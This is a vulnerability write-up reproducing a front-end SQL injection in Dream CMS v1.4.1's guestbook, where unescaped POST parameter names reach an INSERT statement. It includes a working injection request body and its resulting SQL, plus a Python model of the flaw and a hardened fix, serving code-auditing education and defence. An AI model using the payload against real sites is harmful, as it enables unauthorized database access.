Dream CMS foreground SQL injection
2022-07-18 04:40:00 【fantastic_ life】
Dream CMS front-end SQL injection
The v1.4.1 source code is attached in the current directory, in case the source for the vulnerability described below can no longer be found later.
Affected version
Version: v1.4.1
Vulnerability analysis
This article reproduces the vulnerability described in https://xz.aliyun.com/t/11224, so we go straight to the flaw. This front-end SQL injection point is quite interesting: once you have learned the basics of SQL injection, this bug is a good one to consolidate them on.
The flaw is in the front-end message board (guestbook). Someone who has just started hunting vulnerabilities might think of XSS first when they see a message form, but this one is a SQL injection. Capturing the request sent when a message is saved shows the URL /index.php?m=Book&a=setBook; the code handling this request is the following part of c/index/BookAction.class.php:
public function index(){
    if(isset($_POST['setbook'])){ // message submitted
        $data = $this->checkData();
        if($this->bookModel->add($data)){
            $this->setBookTime(); // store the submission time
            rewrite::succ($this->l['book_ok']);
        }else{
            rewrite::error($this->l['book_error']);
        }
    }
    // decide whether message data should be loaded for display
    if($GLOBALS['public']['isbookdata']){
        // decide whether only approved messages are shown
        $where = '';
        if($GLOBALS['public']['bookDisplay']) $where = 'ischeck=1';
        $count = $this->bookModel->count($where);
        $page = new page($count,$GLOBALS['public']['booknum']);
        $data = $this->bookModel->getData($page->returnLimit(),$where);
        $this->smarty->assign('list',$data);
        $this->smarty->assign('num',$count);
        $this->smarty->assign('page',$page->html());
    }
    $this->smarty->display('book/index.html');
}
In this code, $data = $this->checkData(); calls checkData() to validate and process the submitted data: it filters the submitted values for XSS and SQL injection and enforces a minimum interval between submissions. $this->bookModel->add($data) then stores the data in the database.
Following that call leads to the following code in m/BookModel.class.php:
// add a message from the front end
public function add($data){
    $data['time'] = time();
    return parent::addModel($data);
}
and from there to the following code in class/Model.class.php:
// insert data and return the new id
protected function addModel($data){
    return parent::addDB($this->tab[0],$data);
}
Finally the call reaches the following part of class/db.class.php:
// insert
protected function addDB($tab,$data){
    foreach($data as $key=>$v){
        $field[]=$key;
        $value[]="'$v'";
    }
    $field = implode(',',$field);
    $value = implode(",",$value);
    $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)";
    $this->query($sql);
    return mysql_insert_id();
}
The flaw is in this last method, addDB(). The SQL is built by looping over the incoming array: every key is appended to the $field array as a column name, and every value, wrapped in single quotes, is appended to the $value array. Both arrays are turned into comma-separated strings with implode() and spliced into $sql. The value side is only as safe as the escaping done earlier in checkData(), but $field[]=$key; does no processing at all on the field names, and those come straight from the POST parameter names. That is where we inject.
Vulnerability testing
Intercept the save request in the browser and change the request body to the following: name=%E5%95%8A%E5%95%8A%E5%95%8A&mail=aa%40qq.com&tel=121111&content=2323&setbook=%E6%8F%90%E4%BA%A4&time,ischeck)VALUES(user(),1,1,1,1,1,1);#=1
All we have added is the parameter &time,ischeck)VALUES(user(),1,1,1,1,1,1);#=1. Its name becomes an array key, so it closes the column list, supplies its own VALUES clause, and the trailing ;# comments out the rest of the original SQL. Printing $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)"; while debugging shows:
INSERT INTO lmx_book(name,content,mail,tel,ip,time,ischeck)VALUES(user(),1,1,1,1,1,1);#,time) VALUES('啊啊啊','2323','aa@qq.com','121111','192.168.80.1','1','1657690699')
The message then appears on the message board, and its author name is the database user name returned by user().
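To make the splicing concrete, here is an added example that is not Dream CMS code, written in Python so it runs stand-alone. It models addDB() as shown above, reproduces from the crafted POST data the exact SQL printed in the debug output, and contrasts it with a hardened variant that allow-lists column names and binds values. The $data dictionary, the column allow-list for lmx_book and the SQLite table shape are constructed assumptions; the post does not show the real schema, and MySQL would quote identifiers with backticks rather than double quotes.

```python
"""Added example, not Dream CMS code: models db.class.php addDB() splicing and a fix."""
import sqlite3

DB_PRE = "lmx_"

# Constructed $data as it reaches addDB() after the crafted POST:
# PHP keeps the malformed form-field name as an array key with value "1",
# checkData() leaves keys alone, and BookModel::add() appends time.
INJECTED_KEY = "time,ischeck)VALUES(user(),1,1,1,1,1,1);#"
CRAFTED_DATA = {
    "name": "啊啊啊",
    "content": "2323",
    "mail": "aa@qq.com",
    "tel": "121111",
    "ip": "192.168.80.1",
    INJECTED_KEY: "1",
    "time": "1657690699",
}

# Assumed column list for lmx_book; the real schema is not shown in the post.
BOOK_COLUMNS = frozenset({"name", "content", "mail", "tel", "ip", "time", "ischeck"})


def add_db_vulnerable(tab, data):
    """Faithful model of the original addDB(): keys are spliced raw into the column
    list and values are merely wrapped in single quotes. Returns the SQL text."""
    field = ",".join(data.keys())
    value = ",".join(f"'{v}'" for v in data.values())
    return f"INSERT INTO {DB_PRE}{tab}({field}) VALUES({value})"


def unexpected_columns(data, allowed):
    """Keys that are not known columns; any hit means the request was tampered with."""
    return [k for k in data if k not in allowed]


def add_db_hardened(conn, tab, data, allowed):
    """Only allow-listed, quoted identifiers reach the SQL text; values are bound
    parameters, so neither keys nor values can alter the statement."""
    bad = unexpected_columns(data, allowed)
    if bad:
        raise ValueError(f"unexpected column(s): {bad}")
    cols = list(data)
    field = ",".join(f'"{c}"' for c in cols)      # SQLite quoting; MySQL uses backticks
    marks = ",".join("?" for _ in cols)
    sql = f"INSERT INTO {DB_PRE}{tab}({field}) VALUES({marks})"
    return conn.execute(sql, [data[c] for c in cols]).lastrowid


def demo():
    """Run both paths against an in-memory SQLite table shaped like lmx_book."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE lmx_book(id INTEGER PRIMARY KEY, name, content, mail, "
        "tel, ip, time, ischeck INTEGER DEFAULT 0)"
    )
    try:
        add_db_hardened(conn, "book", CRAFTED_DATA, BOOK_COLUMNS)
        crafted = "inserted"                      # must not happen
    except ValueError as exc:
        crafted = str(exc)
    legit = {k: v for k, v in CRAFTED_DATA.items() if k != INJECTED_KEY}
    legit["name"] = "O'Brien"                     # a quote in a bound value is harmless
    rowid = add_db_hardened(conn, "book", legit, BOOK_COLUMNS)
    stored = conn.execute(
        "SELECT name, ischeck FROM lmx_book WHERE id=?", (rowid,)
    ).fetchone()
    return crafted, rowid, stored


if __name__ == "__main__":
    print(add_db_vulnerable("book", CRAFTED_DATA))
    print(demo())
```

Running the block prints the same INSERT the post obtained by debugging, then shows the hardened path rejecting the crafted key while still storing a legitimate message whose value contains a single quote. The allow-list is the essential part: quoting identifiers alone would still let an attacker pick arbitrary column names such as ischeck.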
Summary
This bug is a good small exercise both for learning SQL injection and for getting started with code auditing.